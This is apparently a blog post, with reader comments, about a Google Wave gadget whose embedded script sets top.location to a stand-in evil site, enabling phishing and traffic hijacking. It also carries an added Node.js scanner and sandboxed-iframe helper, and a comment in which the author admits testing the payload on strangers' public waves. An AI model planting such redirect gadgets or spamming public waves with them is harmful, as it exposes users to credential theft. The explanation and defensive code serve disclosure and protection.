Redirection attack with Google Wave

Dear Google Wave user, do not trust every wave, even one that comes from your co-worker. A wave can contain various elements, including text, images, attachments and so on. The most powerful feature is that one can embed a gadget inside a wave. Wave gadgets are not full-blown applications but small add-ons that can improve a conversation. For example, a wave might include a gadget that lets wave participants vote on where to go to lunch.

Let’s look at a simple hello world gadget:

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="hello world example" />
<Content type="html"><![CDATA[
Hello, world!
]]></Content>
</Module>

If you save this content in an XML file, host it on a server, and then add the URL of that XML file while creating or replying to a wave, the participants of the wave will see the message “Hello, world!” when they open it. This is how gadgets work in Google Wave. Now, if we modify the gadget in the following way, what will happen?

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="hello world example" />
<Content type="html"><![CDATA[
<script type="text/javascript">
top.location = "http://www.evil.com"
</script>
]]></Content>
</Module>

Yes, the participants of the wave that included this gadget will be immediately redirected to the evil site. A phishing attack with Google Wave is possible in this way, and that is the dangerous issue I am talking about. An attacker can redirect you to a page that looks like the Google Wave login page. You will think that for some reason you have been logged out, and you will enter your username and password to log in again instead of asking why you were logged out. As soon as you submit the credentials, the attacker has your username and password, because you submitted them on the attacker’s page, not on Google Wave’s actual login page.
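As an added example (not code from the original post, and not anything Google Wave’s own gadget container did), here is what the page that embeds a gadget can check and enforce against exactly this case. It is a small Node.js script with two parts: a static check that pulls the HTML out of a gadget XML file’s CDATA section and flags inline scripts and top/parent location assignments before the gadget is accepted, and a helper that emits the gadget iframe with an HTML5 sandbox attribute that omits allow-top-navigation, so the browser itself refuses the top.location assignment even when the check misses it. The two gadget documents inside are constructed to mirror the two on this page; the function names and the chosen sandbox flags are my assumptions.

```javascript
// Added example, not from the original post: a pre-embed check for gadget XML
// and a sandboxed way to embed one. The sample gadgets below are constructed to
// mirror the two gadgets shown on this page.

const HELLO_GADGET = `<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="hello world example" />
<Content type="html"><![CDATA[
Hello, world!
]]></Content>
</Module>`;

const REDIRECT_GADGET = `<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="hello world example" />
<Content type="html"><![CDATA[
<script type="text/javascript">
top.location = "http://www.evil.com"
</script>
]]></Content>
</Module>`;

// Pull the HTML payload out of the gadget's <Content type="html"> CDATA section.
// Returns null when the document has no such section.
function extractGadgetHtml(xml) {
  const m = /<Content\b[^>]*>\s*<!\[CDATA\[([\s\S]*?)\]\]>/i.exec(xml);
  return m ? m[1] : null;
}

// Patterns that let a framed gadget navigate the page that embeds it.
// Deliberately no "g" flag: a global regex keeps lastIndex between .test() calls.
const TOP_NAVIGATION_RE = /\b(?:window\s*\.\s*)?(?:top|parent)\s*\.\s*location\b/;
const TOP_TARGET_RE = /\btarget\s*=\s*["']?_top\b/i;

// Static review of one gadget document. ok === true means nothing was flagged.
function scanGadget(xml) {
  const html = extractGadgetHtml(xml);
  if (html === null) {
    return { ok: false, findings: ['no <Content type="html"> CDATA section found'] };
  }
  const findings = [];
  if (/<script\b/i.test(html)) {
    findings.push('inline <script> block');
  }
  if (TOP_NAVIGATION_RE.test(html)) {
    findings.push('assignment to top/parent location (redirects the whole page)');
  }
  if (TOP_TARGET_RE.test(html)) {
    findings.push('link with target="_top"');
  }
  return { ok: findings.length === 0, findings };
}

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(s) {
  return String(s).replace(/[&<>"']/g, (c) => (
    { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]
  ));
}

// Embed markup for a gadget. The sandbox attribute grants scripts and forms but
// not allow-top-navigation, so a top.location assignment inside the frame is
// refused by the browser even if the scan above missed it.
function sandboxedGadgetFrame(gadgetUrl) {
  const u = new URL(gadgetUrl); // throws on malformed input
  if (u.protocol !== 'https:' && u.protocol !== 'http:') {
    throw new Error(`refusing to embed gadget with scheme ${u.protocol}`);
  }
  return `<iframe src="${escapeAttr(u.href)}" sandbox="allow-scripts allow-forms"></iframe>`;
}

// Stand-alone demo: scan both constructed gadgets and print one sandboxed embed.
if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, xml] of [['hello', HELLO_GADGET], ['redirect', REDIRECT_GADGET]]) {
    const r = scanGadget(xml);
    console.log(`${name}: ${r.ok ? 'clean' : 'FLAGGED: ' + r.findings.join('; ')}`);
  }
  console.log(sandboxedGadgetFrame('https://gadgets.example/hello.xml'));
}
```

The scan is a cheap first filter and will not catch every way of reaching top.location (obfuscated or dynamically built code, for instance), which is why the sandbox attribute on the embedding iframe is the control that actually matters: with allow-top-navigation absent, the browser refuses the navigation regardless of how the gadget’s script is written.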

This can happen because most users don’t always look at the browser’s address bar. Whenever they are asked for credentials, they will enter them, because the phishing page will look very similar to Google Wave’s real login page. So, always look at the address bar, especially when any credential is asked for. Just make sure you are putting the right information in the right place.

A similar attack can be used for a different purpose. One can use this redirection technique to increase traffic to one’s own site as well. A wave can be public, and there is a way to search all public waves: search with with:public. You can add keywords as well, such as with:public first time. This way a user can search hundreds of thousands of public waves and then reply to all of them with the malicious gadget. Everyone who visits those waves will be redirected to the user’s site, and he will get a lot of traffic until Google catches him.


8 thoughts on “Redirection attack with Google Wave”

  1. I appreciate the information, but surely it’s better to create a wave that does this rather than altering existing waves.

  2. @James: I understand what you meant; actually I was experimenting by replying to some public waves. And you are the proof that it works. Thanks for your comment.

  3. So why have Google made it so that the wave screen can be taken over? Is there no way to prevent it?

    There also needs to be some way to make waves private while allowing new people to join in some way, and it can’t be by adding hundreds of people to a wave, as it would take too long.

    Btw, I am still using that wave you directed me from, so could you kindly give it back?

  4. Thanks for giving the alert to be careful, and I should be. This is a really horrible matter if someone is taking someone’s credentials. Do you have any more suggestions to prevent such suspicious acts? Did you post your finding to the Google Wave doctor?

  5. @Obaidul: Yes, Google is already aware of this issue, but interestingly they don’t think this is a security problem right now. But one day they will wake up when some bad people start to use this hole to generate traffic or phishing. Right now, just don’t trust all waves.
